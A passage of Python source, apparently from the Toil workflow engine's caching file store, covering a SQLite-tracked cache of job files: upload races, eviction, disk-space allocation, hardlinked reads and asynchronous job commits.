# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
rowCount = self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))])
if rowCount != 1:
# We didn't manage to update it. Someone else (a running job if
# we are a committing thread, or visa versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
try:
self.jobStore.updateFile(fileID, filePath)
except:
# We need to set the state back to 'uploadable' in case of any failures to ensure
# we can retry properly.
self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploadable', fileID, 'uploading'))])
raise
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
self._staticWrite(con, cur, [('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))])
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
me = get_process_name(self.workDir)
self._write([('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, me))])
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cls._staticWrite(con, cur, [('DELETE FROM refs WHERE job_id = ?', (jobID,))])
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cls._staticWrite(con, cur, [('DELETE FROM jobs WHERE id = ?', (jobID,))])
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.workDir, self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
# Or someone mught be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
me = get_process_name(self.workDir)
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self._write([("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'deleting', fileID, 'cached'))])
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We deleted something
logger.debug('Successfully executed pending deletions to free space')
return True
def _freeUpSpace(self):
"""
If disk space is overcomitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
# This is the longes that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.workDir, self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# Make sure to pass along the file basename.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup, os.path.basename(localFileName))
# Work out who we are
me = get_process_name(self.workDir)
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self._write([('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', me)),
('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))])
if absLocalFileName.startswith(self.localTempDir) and not os.path.islink(absLocalFileName):
# We should link into the cache, because the upload is coming from our local temp dir (and not via a symlink in there)
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Hardlinked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
assert not os.path.islink(cachePath), "Symlink %s has invaded cache!" % cachePath
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# If you are uploading a file that physically exists outside the
# local temp dir, it should not be linked into the cache. On
# systems that support it, we could end up with a
# hardlink-to-symlink in the cache if we break this rule, allowing
# files to vanish from our cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be.
# And drop the file altogether.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID)),
('DELETE FROM files WHERE id = ?', (fileID,))])
# Save the file to the job store right now
logger.debug('Actually executing upload immediately for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
if cache:
# We want to use the cache
if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))])
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))])
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, localFilePath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
if self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, cachedPath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self._write([("""
UPDATE files SET files.owner = ?, files.state = ? WHERE files.id = ? AND files.state = ?
AND files.owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'downloading', fileStoreID, 'cached'))])
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
time.sleep(self.contentionBackoff)
# OK, now we have space to make a copy.
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make the copy
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress before re-polling.
time.sleep(self.contentionBackoff)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make our copy
atomic_copy(cachedPath, localFilePath)
# Change our reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
:rtype: bool
"""
# Work out who we are
me = get_process_name(self.workDir)
# See if we actually own this file and can giove it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# Don't fake a delay here; this should be a rename always.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID)),
('DELETE FROM files WHERE id = ?', (fileStoreID,))])
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist. Source must exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
assert os.path.exists(cachedPath), "Cannot create link to missing cache file %s" % cachedPath
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists.
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
logger.debug('Trying to make file downloading file record and reference for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me)),
('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('We already have an entry in the cache database for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self._write([('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))])
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
# We may have acquired ownership of partially-downloaded
# files, now in deleting state, that we need to delete
# before we can download them.
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress.
time.sleep(self.contentionBackoff)
def readGlobalFileStream(self, fileStoreID):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except FileNotFoundError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
if len(deleted) == 0 and not missingFile:
# We have to tell the user if they tried to delete 0 local copies.
# But if we found a missing local copy, go on to report that instead.
raise OSError(errno.ENOENT, "Attempting to delete local copies of a file with none: {}".format(fileStoreID))
for path in deleted:
# Drop the references
self._write([('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))])
logger.debug('Deleted local file %s for global file %s', path, fileStoreID)
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
try:
# Delete local copies of the file
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# Turns out there weren't any
pass
else:
raise
# Work out who we are
me = get_process_name(self.workDir)
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self._write([('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', me, fileStoreID))])
# Finish the delete if the file is present
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(str(fileStoreID))
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
# If running in the destructor, we may already *be* in the commit
# thread. It can do some destructor work after it finishes its real
# work.
if self.commitThread is not None and self.commitThread is not threading.current_thread():
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(self.workDir, con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow diorectory for the node, which is used as the
